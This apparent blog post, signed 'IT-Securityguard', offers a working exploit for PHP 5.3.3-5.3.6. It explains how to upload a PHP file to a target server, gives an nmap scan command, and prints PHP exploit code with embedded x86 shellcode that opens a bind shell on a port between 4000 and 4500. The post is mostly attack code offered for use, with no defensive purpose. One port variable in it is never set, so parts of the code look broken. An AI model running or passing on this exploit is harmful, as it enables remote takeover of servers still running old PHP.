Dear Readers, 5.3.3-5.3.6 is still used and its very easy to exploit.

All you need to do is find a way to upload a PHP file to the server, then call it.

The Payload is a bind tcp shell opening a port on the server between 4000 – 4500 to find the open one just use Nmap

nmap -sS -p 4000-4500 IP

<?php
 
error_reporting(E_ALL);
/* Initialize */
$a = 1;
$b = new stdClass();
/* Setup Error Handler */
set_error_handler("my_error");
/* Trigger the Code */
$addr = $a << $b;
$addr >>= 1;
restore_error_handler();
echo $port;
echo sprintf("%08x\n", $addr);
$addr+=10;
$b = str_repeat("A", 186).pack("L",$addr);
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
flush();
sleep(1);
$var85 = socket_connect($var79,$b);
function my_error()
{
global $p;
$GLOBALS['a'] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" .
"\x80\x5b\x5e\x52\x68\xff\x02".$p."\x6a\x10\x51\x50\x89" .
"\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd" .
"\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49" .
"\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" .
"\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xdb\x6a\x01\x58\xcd\x80";
return 1;
}
?>

you’re welcome

IT-Securityguard